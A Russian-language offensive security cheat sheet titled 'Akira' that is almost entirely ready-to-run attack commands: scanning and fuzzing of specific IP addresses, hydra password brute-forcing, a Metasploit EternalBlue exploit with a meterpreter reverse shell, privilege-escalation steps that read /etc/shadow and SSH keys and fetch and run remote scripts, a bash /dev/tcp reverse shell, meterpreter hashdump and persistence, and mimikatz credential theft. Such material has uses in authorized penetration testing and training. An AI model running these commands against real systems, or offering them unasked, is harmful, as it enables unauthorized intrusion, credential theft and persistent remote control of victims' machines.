📘 Шпаргалка Akira
🔎 Сканирование (Scan)
nmap -sC -sV -v 129.168.0.1
- -sC: стандартные NSE-скрипты
- -sV: определение версии сервисов
- -v: подробный вывод сканирования
🌐 Директории и фаззинг
ffuf -u http://34.142.227.227/FUZZ -w directory-list-big.txt -fs 83978 -s
dirsearch -u http://34.142.227.227/ -w directory-list-big.txt --exclude-sizes=83978 --quiet
⚙️ Основные порты и сервисы
Порт | Сервис | Описание |
21 | FTP | Анонимный доступ / brute |
22 | SSH | Weak логины / OS detection |
23 | Telnet | Часто слабо защищён |
25 | SMTP | Релей / утечки инфы |
53 | DNS | Зоны / DNS-трансфер |
80 | HTTP | Веб-фаззинг / CMS |
443 | HTTPS | SSL-скан / веб-приложения |
445 | SMB | Shares / EternalBlue |
3306 | MySQL | Пароли / инфа |
3389 | RDP | BlueKeep / визуальный доступ |
🛠️ Утилиты и команды
nikto — сканер веб-уязвимостей
nikto -h https://target.com -p 443
nikto -h http://target.com -Tuning x
whatweb — CMS и технологии сайта
whatweb http://target.com
whatweb -v --color=never -a 3 http://target.com
hydra — брутфорс логинов/паролей
hydra -l admin -P passwords.txt ftp://target.com
hydra -l root -P rockyou.txt ssh://192.168.1.1
hydra -L users.txt -P passwords.txt http-get://site.com/login
gobuster — альтернатива ffuf
gobuster dir -u http://target.com -w wordlist.txt
gobuster dns -d target.com -w subdomains.txt
smbclient — работа с SMB
smbclient //192.168.1.10/share -U guest
smbclient -L //192.168.1.10 -N
enum4linux — сбор инфы с Windows
enum4linux -a 192.168.1.10
msfconsole — Metasploit Framework
search exploit smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit
🧨 Повышение привилегий (Privilege Escalation)
Linux
find / -perm -4000 2>/dev/null
ls -la /etc/passwd /etc/shadow
sudo -l
crontab -l && ls -la /etc/cron*
cat ~/.bash_history
echo $PATH
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
Windows
net users
wmic product get name
whoami /priv
net localgroup administrators
# Поиск паролей:
dir /s *.bat *.ps1 *.config
# PowerUp:
DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1")
Invoke-AllChecks
🎯 Post-Exploitation
hostname
ifconfig / ip a
route
ps aux / tasklist
netstat -anp / Get-NetTCPConnection
grep -i pass /etc/*
cat ~/.ssh/id_rsa
💡 Обратный шелл на Bash
bash -i >& /dev/tcp/10.10.10.1/4444 0>&1
💻 Meterpreter
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > upload / download
meterpreter > persistence
📦 Инструменты Post-Exploitation
- mimikatz — кража хэшей и паролей из памяти
- powersploit — PowerShell-фреймворк
- Empire — Постэксплуатация и C2
- Metasploit — Эксплуатация + Post